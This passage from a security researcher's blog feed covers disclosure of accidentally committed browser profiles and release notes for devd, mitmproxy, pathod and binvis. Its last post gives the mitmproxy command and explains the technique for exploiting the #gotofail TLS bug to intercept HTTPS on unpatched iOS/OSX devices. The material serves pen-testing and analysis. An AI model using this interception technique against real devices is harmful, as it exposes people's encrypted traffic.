I'll elide those here, for obvious reasons.</p> <h2 id="a-look-at-the-data">A look at the data</h2> <p>The result was <strong>708</strong> distinct browser profiles that included <strong>33 364</strong> bookmarks, and <strong>88 013</strong> cookies. Many of these profiles are actually intentional checkins - testing trusses, blank profiles and so forth. However, some totally unscientific manual sampling indicates that just less than half of these are probably genuine accidental checkins, containing private information.</p> <p>Let's take a light, high-level look at the data. The figure below shows the percentage of profiles with cookies from each TLD:</p> <figure> <img class="img-responsive center-block" src="./cookies.png"/> <figcaption class="text-center">Percentage of profiles with cookies from domain</figcaption> </figure> <p>As expected, the stats here are dominated by the mega-trackers that infest almost every site on the internet - a familiar cast of rogues including DoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how few domains here are genuine destinations - apparently the top sites for this sample are Google, YouTube, Github (not unexpectedly), and Twitter.</p> <p>Next up is the percentage of profiles with bookmarks for a given domain:</p> <figure> <img class="img-responsive center-block" src="./bookmarks.png"/> <figcaption class="text-center">Percentage of profiles with bookmarks for domain</figcaption> </figure> <p>Here, the top domains are those pre-seeded on install, particularly with Firefox. This explains the Mozilla domains as well as ubuntu.com, debian.org and launchpad.net. Once we're outside of this list, the "genuine destinations" match the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.</p> <h2 id="a-difficult-situation">A difficult situation</h2> <p>The surprise here is not that people accidentally check sensitive information into git repos. 
The real surprise is just how much of a pain in the butt it was to responsibly address the issue. At the end of this little experiment, I had more than 700 repositories that potentially contained sensitive, accidentally exposed user information. It beggars belief, but it's 2015 and the most popular repository hosting service in the world <a rel="external" href="https://github.com/isaacs/github/issues/37">has <strong>no way</strong> to privately report a bug against a repo</a>. One could create a public bug report for each repository in question - but that would be like hanging out a neon sign saying "privacy issue here" for others to find, particularly since bug reports are published in a user's activity stream.</p> <p>In the end, I decided to directly notify as many people as I could by email. So, I wrote a script that checked each affected user's profile for an email address. That left me with 120-odd users with contact details. I manually whittled these down to repositories that were obviously accidental checkins and sent them each an email, resulting in a dozen or so responses with variations on "oops, thanks for letting me know".</p> <h2 id="hey-github">Hey Github!</h2> <p>I have two recommendations for Github that would make this situation vastly, vastly better:</p> <ul> <li> <p>Add a mechanism that lets users report private bugs, visible only to the repo owners. There's just no excuse for the lack of a feature like this.</p> </li> <li> <p>Consider restricting search functionality somewhat. One option would be not to index dotfiles (.*) by default, and perhaps let users opt in to dotfile indexing on a per-repo basis. 
The vast majority of accidental checkins are either within dotfiles (shell history, for example), or within directories that start with leading dots (browser history, ssh config).</p> </li> </ul> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>In fact, Github search path specifications seem to be broken now in a more general way, but that's beside the point for this post.</p> </div> devd v0.3 2015-11-12T00:00:00+00:00 2015-11-12T00:00:00+00:00 https://corte.si/posts/devd/0.3/ <div class="media"> <a href="https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd"> <img src="..&#x2F;intro&#x2F;devd-terminal.png" /> </a> </div> <p>I've just released <a rel="external" href="https://github.com/cortesi/devd/releases">devd 0.3</a> - a measured increment, with a modest set of bugfixes and new features. This is in line with my <a href="https://corte.si/posts/devd/0.2/">broad plan to keep devd a small, dependable, and focused tool.</a> Everyone should update.</p> <ul> <li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert bundle is stored in ~/.devd.cert</li> <li>Add the X-Forwarded-Host header to reverse proxied traffic.</li> <li>Disable upstream cert validation for reverse proxied traffic. This makes using self-signed certs for development easy. Devd shouldn't be used in contexts where this might pose a security risk.</li> <li>Bugfix: make CSS livereload work in Firefox</li> <li>Bugfix: make sure the Host header and SNI host match for reverse proxied traffic.</li> </ul> mitmproxy: release v0.14 2015-11-07T00:00:00+00:00 2015-11-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_14/ <div class="media"> <a href="https:&#x2F;&#x2F;mitmproxy.org"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>We've just released <a rel="external" href="http://www.mitmproxy.org">mitmproxy 0.14</a>!
Since the last release, the project has had 399 commits by 13 contributors, resulting in 79 closed issues and 37 closed PRs, all of this in just over 100 days.</p> <ul> <li>Docs: Greatly updated docs <a rel="external" href="http://docs.mitmproxy.org">now hosted on ReadTheDocs</a></li> <li>Docs: Fixed typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han, onlywade, Jurriaan Bremer)</li> <li>mitmdump: Colorized TTY output</li> <li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)</li> <li>mitmproxy and mitmdump: Support for displaying UTF8 contents</li> <li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)</li> <li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)</li> <li>mitmweb: bug fixes (Colin Bendell)</li> <li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.</li> <li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. This yields a massive speedup for TLS handshakes.</li> <li>libmproxy: Prevent unnecessary upstream connections (macmantrl)</li> <li>Inline Scripts: New <a rel="external" href="http://docs.mitmproxy.org/en/latest/dev/models.html#netlib.http.Headers">API for HTTP Headers</a></li> <li>Inline Scripts: Properly handle exceptions in <code>done</code> hook</li> <li>Inline Scripts: Allow relative imports, provide <code>__file__</code></li> <li>Examples: Add probabilistic TLS passthrough as an inline script</li> <li>netlib: Refactored HTTP protocol handling code</li> <li>netlib: ALPN support</li> <li>netlib: fixed a bug in the optional certificate verification.</li> <li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)</li> </ul> <p>I had very little time to spend on mitmproxy this cycle due to an extraordinarily busy patch at work - so, all of the above was shepherded into being by my hyper-efficient co-maintainer, <a rel="external"
href="https://maximilianhils.com/">Maximilian Hils</a>. Having a steady pair of hands to keep things on track while I've been "absent" has been great. As a project, we'd also like to thank Google, who sponsored the work of <a rel="external" href="https://github.com/Kriechi">Thomas Kriechbaumer</a> under the <a rel="external" href="https://developers.google.com/open-source/soc/">Google Summer of Code</a> program, and the <a rel="external" href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work was done. The excellent work Thomas has done on HTTP2 support and many, many other aspects of mitmproxy has been invaluable. Look for new releases building on this soon.</p> devd v0.2 (and some thoughts on small tools) 2015-11-05T00:00:00+00:00 2015-11-05T00:00:00+00:00 https://corte.si/posts/devd/0.2/ <p>I've just released <a rel="external" href="https://github.com/cortesi/devd/releases">version 0.2 of devd</a>, a local webserver for developers. This release contains a number of small improvements, and a few new features.</p> <ul> <li>-x (--exclude) flag to exclude files from livereload.</li> <li>-P (--password) flag for quick HTTP Basic password protection.</li> <li>-q (--quiet) flag to suppress all output from devd.</li> <li>Humanize file sizes in console logs.</li> <li>Improve directory indexes - better formatting, they now also livereload.</li> <li>Devd's built-in livereload URLs are now less likely to clash with user URLs.</li> <li>Internal 404 pages are now included in logs, timing measurement, and filtering.</li> <li>Improved heuristics for livereload file change detection.
We now handle things like transient files created by editors better.</li> <li>A Linux ARM build will now be distributed with each release.</li> </ul> <p>Thanks to <a rel="external" href="http://brennie.ca">Barret Rennie</a>, <a rel="external" href="http://billmill.org">Bill Mill</a> and Judson Mitchell (<a href="mailto:[email protected]">[email protected]</a>) for contributing to this release.</p> <h1 id="some-thoughts-on-small-tools">Some thoughts on small tools</h1> <p>I love small, modest tools that do one thing well. I wrote devd partly out of nostalgia for <a rel="external" href="http://acme.com/software/thttpd/">thttpd</a>, a tiny web daemon that was my rough-and-ready, just-serve-files-now webserver for many years. It was a single, small binary that I could cross-compile for all the platforms I used, and it did its humble job well. Back in the day, it was one of the first things I put on every new box, along with my shell configuration and ssh keys. When it started showing its age, I moved on to the usual combination of built-in interpreter daemons (e.g. "python -m SimpleHTTPServer") and more heavy-handed tools, but not without a touch of sadness. Looking back on it now, it's clear that the thttpd I remember is a somewhat rose-tinted version of the real thing: thttpd actually did both more and less than I really needed. Devd strives to be a tool in the same spirit, one that matches more closely what I want in my <a rel="external" href="https://en.wikipedia.org/wiki/Everyday_carry">EDC</a> http daemon. If people think of it as a small, dependable and unobtrusive part of their daily toolset, I'll have done <em>my</em> job well.</p> <p>This release includes a few new features for devd, and the next release will add a few more. Not long after that, I expect it to be more or less feature complete.
It will continue to improve internally, and bugs will always be fixed, but it will never sprout the ability to run PHP or render less on the fly (both feature requests I've had since the first release). Instead, it will focus on doing the few things it does as well as it can: serve files, act as a reverse proxy tying development servers together, and live reload when files change.</p> devd: a web daemon for developers 2015-10-23T00:00:00+00:00 2015-10-23T00:00:00+00:00 https://corte.si/posts/devd/intro/ <p>I've just released <a rel="external" href="https://github.com/cortesi/devd">devd</a>, a small, self-contained, command-line-only HTTP server for developers. It started as a weekend stress-relief hack (that's a thing where I'm from), but has now become my preferred "daily driver" for most web-ish things. It's simple, direct and does more or less exactly what I need. This isn't terribly surprising, since I wrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy hackers will find it useful too.</p> <h2 id="quick-start">Quick start</h2> <p>Serve the current directory, open it in the browser (<strong>-o</strong>), and livereload when files change (<strong>-l</strong>):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -ol</span><span style="color: #032F62;"> .</span></span></code></pre> <p>Reverse proxy to http://localhost:8080, and livereload when any file in the <strong>src</strong> directory changes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> ./src http://localhost:8080</span></span></code></pre><h2 id="features">Features</h2> <h3 id="cross-platform-and-self-contained">Cross-platform and 
self-contained</h3> <p>Devd is a single statically compiled binary with no external dependencies, and is released for OSX, Linux and Windows. Don't want to install Node or Python in that light-weight Docker instance you're hacking in? Just copy over the devd binary and be done with it.</p> <h3 id="designed-for-the-terminal">Designed for the terminal</h3> <p>This means no config file, no daemonization, and logs that are designed to be read in the terminal by a developer. Logs are colorized and log entries span multiple lines. Devd's logs are detailed, warn about corner cases that other daemons ignore, and can optionally include things like detailed timing information and full headers.</p> <div class="media"> <a href="https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd"> <img src=".&#x2F;devd-terminal.png" /> </a> </div> <p>To make quickly firing up an instance as simple as possible, devd automatically chooses an open port to run on (unless it's specified), and can open a browser window pointing to the daemon root for you (the <strong>-o</strong> flag in the example above).</p> <h3 id="livereload">Livereload</h3> <p>When livereload is enabled, devd injects a small script into HTML pages, just before the closing <em>head</em> tag. The script listens for change notifications over a websocket connection, and reloads resources as needed. No browser addon is required, and livereload works even for reverse proxied apps. If only changes to CSS files are seen, devd will only reload external CSS resources, otherwise a full page reload is done. 
This serves the current directory with livereload enabled:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -l</span><span style="color: #032F62;"> .</span></span></code></pre> <p>You can also trigger livereload for files that are not being served, letting you reload reverse proxied applications when source files change. So, this command watches the <em>src</em> directory tree, and reverse proxies to a locally running application:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> ./src http://localhost:8888</span></span></code></pre><h3 id="reverse-proxy-static-file-server-flexible-routing">Reverse proxy + static file server + flexible routing</h3> <p>Modern apps tend to be collections of web servers, and devd caters for this with flexible reverse proxying. You can use devd to overlay a set of services on a single domain, add livereload to services that don't natively support it, add throttling and latency simulation to existing services, and so forth.</p> <p>Here's a more complicated example showing how all this ties together - it overlays two applications and a tree of static files. 
Livereload is enabled for the static files (<strong>-l</strong>) and also triggered whenever source files for reverse proxied apps change:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -l \</span></span> <span class="giallo-l"><span>-w</span><span style="color: #032F62;"> ./src/</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/=http://localhost:8888</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/api/=http://localhost:8889</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/static/=./assets</span></span></code></pre><h3 id="light-weight-virtual-hosting">Light-weight virtual hosting</h3> <p>Devd uses a dedicated domain - <strong>devd.io</strong> - to do simple virtual hosting. This domain and all its subdomains resolve to 127.0.0.1, which we use to set up virtual hosting without any changes to <em>/etc/hosts</em> or other local configuration. Route specifications that don't start with a leading <strong>/</strong> are taken to be subdomains of <strong>devd.io</strong>. So, the following command serves a static site from devd.io, and reverse proxies a locally running app on api.devd.io:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #032F62;"> ./static api=http://localhost:8888</span></span></code></pre> <p>Check out the docs at <a rel="external" href="https://github.com/cortesi/devd">the Github repo</a> for the full route specification syntax.</p> <h3 id="latency-and-bandwidth-simulation">Latency and bandwidth simulation</h3> <p>Want to know what it's like to use your fancy 5MB HTML5 app from a mobile phone in Botswana?
Look up the bandwidth and latency <a rel="external" href="http://www.cisco.com/c/en/us/solutions/collateral/service-provider/global-cloud-index-gci/CloudIndex_Supplement.html">here</a>, and invoke devd like so (making sure to convert from kilobits per second to kilobytes per second):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -d 114 -u 51 -l 75</span><span style="color: #032F62;"> .</span></span></code></pre> <p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it uses a token bucket implementation for throttling, properly handles concurrent requests, and chunks traffic up so data flow is smooth.</p> mitmproxy: release v0.13 2015-07-26T00:00:00+00:00 2015-07-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_13/ <div class="media"> <a href="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>This is a slightly late announcement of the release of <a rel="external" href="https://mitmproxy.org">mitmproxy v0.13</a>, which was pushed out the door earlier this week by my esteemed compatriots while I was tied up with other things. We have a number of big new features this time round. First, mitmproxy now has upstream certificate validation, thanks to the hard work of <a rel="external" href="https://github.com/kyle-m">Kyle Morton</a>. Mitmproxy is increasingly being used in user-oriented roles where upstream cert validation is crucial, so this is a welcome improvement. We also have a new transparent proxy mode, which uses the HTTP Host headers to detect the upstream server to connect to, rather than the OS NAT tables. This isn't accurate 100% of the time, but it's so convenient that having it in the base makes sense. Thanks to <a rel="external" href="https://github.com/ijiro123">Ijiro123</a>. 
Other improvements include marking of flows in mitmproxy console (thanks to <a rel="external" href="https://github.com/drahosj">Jake Drahos</a>) and an addition to the filter language allowing better matching of source and destination addresses (thanks to <a rel="external" href="https://github.com/isra17">Israel Halle</a>).</p> <p>This release also features something a bit more unusual: a removed feature. We added the ability to forward server certificates through to the client verbatim to allow mitmproxy to exploit the infamous <a rel="external" href="https://www.imperialviolet.org/2014/02/22/applebug.html">#gotofail</a> bug on iOS and OSX. We were one of the first (and perhaps THE first) publicly available mechanisms to exploit this issue, and pen testers, app reversers and curious folks everywhere rejoiced. Unfortunately, cert forwarding has become a support burden - for fiddly technical reasons, it adds a lot of complication to the way mitmproxy is distributed and installed. Since #gotofail is no longer so current, we've decided to remove support from mitmproxy. If you still have some vulnerable devices out there you need to muck with, the official answer at the moment is to install v0.12.</p> mitmproxy v0.12.1 2015-06-04T00:00:00+00:00 2015-06-04T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_12_1/ <div class="media"> <a href="mitmproxy_0_12_1.gif"> <img src="mitmproxy_0_12_1.gif" /> </a> </div> <p>I've just released <a rel="external" href="http://mitmproxy.org">mitmproxy v0.12.1</a>. This release fixes a few crashing bugs that slipped through in the previous iteration, so everyone should upgrade.</p> <p>Also included are a number of small improvements. The most noticeable of these is mouse interaction for mitmproxy console - the screen capture above shows me scrolling with my mouse, clicking to view a flow and switch tabs.
We pay a small price for this - users now have to hold down a modifier key (shift on some systems, alt on others) to select text in the terminal for copying and pasting. To ease users into this, we've added a warning if we detect an attempt to select text without the right modifier key.</p> mitmproxy: release v0.12 and some project news 2015-05-26T00:00:00+00:00 2015-05-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_12/ <h2 id="project-news">Project News</h2> <p>Before we get to the new release, I'd like to give a quick update on some internal project developments.</p> <p>First up, after a somewhat involved process that included a couple of rounds of community voting and much discussion, we have a new logo:</p> <div class="media"> <a href="mitmproxy-long.png"> <img src="mitmproxy-long.png" /> </a> </div> <p>This will be rolled out in all the places where it makes sense along with the 0.12 release.</p> <p>Second, the long-dormant <a rel="external" href="http://twitter.com/mitmproxy">@mitmproxy</a> Twitter account is finally waking up. Please follow us there for mitmproxy project updates and related news.</p> <p>Third, we'd like to welcome <a rel="external" href="https://github.com/Kriechi">Thomas Kriechbaumer</a> to the project. Thomas is being sponsored to work on mitmproxy under the <a rel="external" href="https://developers.google.com/open-source/soc/">Google Summer of Code</a> program, and will be adding HTTP2 support - one of our most anticipated features. Special thanks goes to the <a rel="external" href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work will be done.</p> <p>Lastly, a peek into the project's immediate future. We have websockets support on the way, thanks to a protocol contribution by <a rel="external" href="https://github.com/Chandler">Chandler Abraham</a>. We have HTTP2 on the way, thanks to Thomas. 
The mitmproxy web interface is gradually maturing behind the scenes, and should be ready to be unleashed on the world soon. And, of course, the project continues to improve quickly in almost every other respect. It's an exciting time, and there's a lot of interesting work to do - if you'd like to be involved, please get in touch.</p> <h2 id="mitmproxy-v0-12">mitmproxy v0.12</h2> <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>The most immediately visible change in v0.12 is a thorough overhaul of the console interface, which has been improved in almost every respect. Performance and responsiveness are better, keybindings have been consolidated, and options have been collected in a dedicated options screen (shortcut "o"). Palettes have been overhauled entirely, with improvements to the palettes themselves, the ability to change palettes on the fly, and support for non-transparent (mitmproxy sets the console background) and transparent (your emulator sets the console background) modes. The console application has also sprouted a powerful new cookie editor that will make tampering with cookie names and values more convenient.</p> <p>Other major features include official support for transparent mode on FreeBSD (thanks to <a rel="external" href="http://github.com/mike-pt">Mike C</a>), the ability to log TLS master keys for use with other tools like Wireshark, and support for creating flows from scratch in the console app (thanks to <a rel="external" href="https://github.com/gato">Marcelo Glezer</a>). A thorough overhaul of the documentation is also under way - thanks to <a rel="external" href="https://github.com/elitest">Jim Shaver</a> for his work there.</p> <h2 id="pathod-v0-12">pathod v0.12</h2> <p>I'm also releasing pathod v0.12. The primary change here is the first phase of full support for websockets.
At the moment, this is client-only - server support will follow in the next release.</p> <p>Here's a taster - the pathoc command below initiates a websocket connection to echo.websockets.org, then sends 10 websocket frames, each with a body of 100 random bytes.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> ./pathoc echo.websockets.org ws:/ wf:b@100:x10</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;</span><span> ws:/</span></span> <span class="giallo-l"><span style="color: #D73A49;">&lt;&lt;</span><span style="color: #032F62;"> 200</span><span style="color: #6F42C1;"> OK:</span><span style="color: #005CC5;"> 225</span><span style="color: #032F62;"> bytes</span></span> <span class="giallo-l"><span style="color: #032F62;">&gt;&gt; wf:b@100:ir,@1</span></span></code></pre> <p>The usual range of injections and stream manipulations is available, and every aspect of the websocket frames can be manipulated in ways that creatively violate the specs. See the pathod documentation for the language definition.</p> binvis.io - a browser-based tool for visualising binary data 2015-03-04T00:00:00+00:00 2015-03-04T00:00:00+00:00 https://corte.si/posts/binvis/announce/ <p>Over the years, I've written a number of posts on this blog on the topic of binary data visualisation. I looked at <a href="https://corte.si/posts/visualisation/binvis/">using space-filling curves to understand the structure of binary data</a>, I've shown how <a href="https://corte.si/posts/visualisation/entropy/">entropy visualisation lets you trivially pick out compressed and encrypted sections</a>, and I've drawn <a href="https://corte.si/posts/visualisation/malware/">pretty pictures of malware</a>. 
Unfortunately the tools I wrote (<a rel="external" href="https://github.com/cortesi/scurve">code here</a>) all produced static images, which made practical use a pain. You really need interactivity to be able to combine visual exploration with inspection of the actual underlying data, and to let you easily export interesting sections.</p> <h2 id="binvis-io"><a rel="external" href="http://binvis.io">binvis.io</a></h2> <p>I recently started toying with the idea of using web technologies to build an interactive visualiser of this sort. One thing led to another... and today, I'm happy to announce a first draft of the idea: binvis.io.</p> <div class="media"> <a href="http:&#x2F;&#x2F;binvis.io&#x2F;#&#x2F;view&#x2F;examples&#x2F;elf-Linux-ARMv7-ls.bin?colors=entropy"> <img src="binvis.png" /> </a> </div> <p>With binvis.io you can:</p> <ul> <li>Visually explore binary data</li> <li>Cluster bytes to pick out fine structural features with space-filling curves</li> <li>Use the simple scan layout to navigate and select data intuitively</li> <li>Flip between a number of useful byte color mappings, including an entropy visualiser that lets you pick out compressed or encrypted sections</li> <li>Export data segments for analysis</li> </ul> <h2 id="next-steps">Next steps</h2> <p>Right now, Binvis is local only - that is, when you open a file, all analysis is done in your browser and nothing is sent to the server. In the longer term, I'd like to add the ability to upload, share and annotate binaries, both publicly and privately. There is probably a market of... oh, at least a dozen people out there who would have use for an imgur-like sharing system for binaries. Fame and riches surely await. Of course, there are also an immense number of other improvements to be made to almost every aspect of binvis, ranging from speed, to better colour schemes, to improvements in interaction and UX.</p> <p>The todo list is long, and time is short, so I'm looking for serious collaborators. 
If you're interested, drop me a line!</p> <h2 id="thanks">Thanks</h2> <p>Binvis isn't the first interactive binary visualisation tool of this sort. A few others that spring to mind are <a rel="external" href="https://sites.google.com/site/xxcantorxdustxx/about">..cantor.dust</a>, <a rel="external" href="https://github.com/joesavage/binspect">binspect</a> and <a rel="external" href="https://github.com/wapiflapi/binglide">binglide</a>. I'm trying to learn from these precursors, and I'm delighted to see that they all also drew, to a greater or lesser extent, on my earlier work. Thus the eternal cycle of code rolls on.</p> <p>I'd like to particularly thank <a rel="external" href="http://www.rumint.org/gregconti/">Greg Conti</a> for letting me re-use the name of <a rel="external" href="https://code.google.com/p/binvis/">his own, much earlier visualisation tool</a>, for publishing a fascinating series of <a rel="external" href="http://www.rumint.org/gregconti/publications/taxonomy-bh.pdf">papers</a> and <a rel="external" href="https://vimeo.com/15633207">talks</a> on the topic, and for providing feedback both on this particular incarnation of the idea as well as my earlier dabblings.</p> mitmproxy 0.11.2 2014-12-29T00:00:00+00:00 2014-12-29T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_11_2/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just pushed <a rel="external" href="http://mitmproxy.org">mitmproxy v0.11.2</a> out the door. This is primarily a bugfix release, but does have one very useful new feature: configuration files. All options available through command-line flags can now be set persistently in config files, for all the tools - <a rel="external" href="http://mitmproxy.org/doc/config.html">see the documentation for more</a>. 
Adding this was made much easier by <a rel="external" href="https://github.com/zorro3/ConfigArgParse">ConfigArgParse</a>, one of those small Python project gems that you feel more people should know about. Check it out.</p> <p>This release also features the usual array of bugfixes and small improvements. In particular, we now handle upstream servers that knock back connections without SNI better, and the onboarding app now works in the OSX binary builds. Everyone should update.</p> mitmproxy and pathod 0.11 2014-11-07T00:00:00+00:00 2014-11-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_11/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I'm happy to announce that we've just released v0.11 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.net">pathod</a>. This release features a huge revamp of mitmproxy's internals and a long list of important features. Pathod has much improved SSL support and fuzzing.</p> <p>Our thanks to the many testers and <a rel="external" href="https://github.com/mitmproxy/mitmproxy/blob/master/CONTRIBUTORS">contributors</a> that helped get this out the door. 
Please lodge bug reports and feature requests <a rel="external" href="https://github.com/mitmproxy/mitmproxy/issues">here</a>.</p> <h2 id="mitmproxy-changelog">Mitmproxy Changelog</h2> <ul> <li>Performance improvements for mitmproxy console</li> <li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server</li> <li>Data streaming for response bodies exceeding a threshold ([email protected])</li> <li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic untouched</li> <li>Finer-grained control of traffic replay, including options to ignore contents or parameters when matching flows ([email protected])</li> <li>Pass arguments to inline scripts</li> <li>Configurable size limit on HTTP request and response bodies</li> <li>Per-domain specification of interception certificates and keys (see --cert option)</li> <li>Certificate forwarding, relaying upstream SSL certificates verbatim (see --cert-forward)</li> <li>Search and highlighting for HTTP request and response bodies in mitmproxy console ([email protected])</li> <li>Transparent proxy support on Windows</li> <li>Improved error messages and logging</li> <li>Support for FreeBSD in transparent mode, using pf ([email protected])</li> <li>Content view mode for WBXML ([email protected])</li> <li>Better documentation, with a new section on proxy modes</li> <li>Generic TCP proxy mode</li> <li>Countless bugfixes and other small improvements</li> </ul> <h2 id="pathod-changelog">Pathod Changelog</h2> <ul> <li>Hugely improved SSL support, including dynamic generation of certificates using the mitmproxy cacert</li> <li>pathoc -S dumps information on the remote SSL certificate chain</li> <li>Big improvements to fuzzing, including random spec selection and memoization to avoid repeating randomly generated patterns</li> <li>Reflected patterns, allowing you to embed a pathod server response specification in a pathoc request, resolving both on client side. 
This makes fuzzing proxies and other intermediate systems much better.</li> </ul> mitmproxy now supports #gotofail 2014-03-11T00:00:00+00:00 2014-03-11T00:00:00+00:00 https://corte.si/posts/security/gotofail-mitmproxy/ <p>A few weeks ago, I posted that I had hacked up <a href="https://corte.si/posts/security/cve-2014-1266/">a version of mitmproxy that exploited CVE-2014-1266</a>, giving unrestricted access to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not to release working code at the time, but a number of <a rel="external" href="https://github.com/gabrielg/CVE-2014-1266-poc">POCs</a> have been floating about publicly almost since the issue was first discovered. So, the time has come to publish - as of yesterday, <a rel="external" href="https://github.com/mitmproxy/mitmproxy">mitmproxy's master branch</a> supports #gotofail.</p> <p>To see the exploit in action, invoke mitmproxy as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">mitmproxy</span><span style="color: #005CC5;"> --ciphers=</span><span style="color: #032F62;">&quot;DHE-RSA-AES256-SHA&quot;</span><span style="color: #005CC5;"> --cert-forward</span></span></code></pre> <p>After configuring your device proxy, you should see something like this screenshot, which shows off interception of miscellaneous iTunes traffic:</p> <div class="media"> <a href=".&#x2F;gotofail-mitmproxy.png"> <img src=".&#x2F;gotofail-mitmproxy.png" /> </a> </div> <p>Note that the client device here has no mitmproxy CA certificate installed, and we get circumvention of certificate pinning "for free".</p> <p>Two new options make the magic work. The <strong>--ciphers</strong> option specifies which SSL ciphers we should expose to connecting clients. In this case, we force the client to use a DHE cipher, which is required to trigger the issue. 
The <strong>--cert-forward</strong> option tells mitmproxy to pass upstream SSL certificates down to the client unmodified. Usually we'd expect this to fail, since the upstream certs won't match mitmproxy's private key. In this case #gotofail means the client fails to properly execute the check, letting us pass certificates through to the client verbatim as if we owned them.</p> <p>There's one additional wrinkle that mitmproxy smooths over - before we can get the mismatching certificate and key to the client, OpenSSL itself has to be coaxed into accepting them. The first version of my exploit involved a patch to OpenSSL to remove the library's own consistency check, but this is inconvenient. Luckily it turns out that we can <a rel="external" href="https://github.com/mitmproxy/netlib/blob/master/netlib/certffi.py">munge an obscure flag</a> in the RSA data-structures to circumvent this, which allows us to exploit #gotofail in pure Python.</p> <p>The moment I got this exploit working, I marched upstairs and confiscated my wife's un-updated iPhone 5 to add it to my pool of test devices (never fear - it's been replaced with a nice new 5S). Devices running IOS of the right vintage have suddenly become the gold standard for analysis and pen testing. This beautiful vulnerability lets us circumvent SSL effortlessly, completely sidestepping certificate pinning for all the applications I've tried, without any <a rel="external" href="https://github.com/iSECPartners/ios-ssl-kill-switch">cumbersome and invasive interference with the device</a>. Combine this with the fact that these same devices also have an un-tethered jailbreak, and I think it's unlikely that we'll ever have an analysis platform this nice again. 
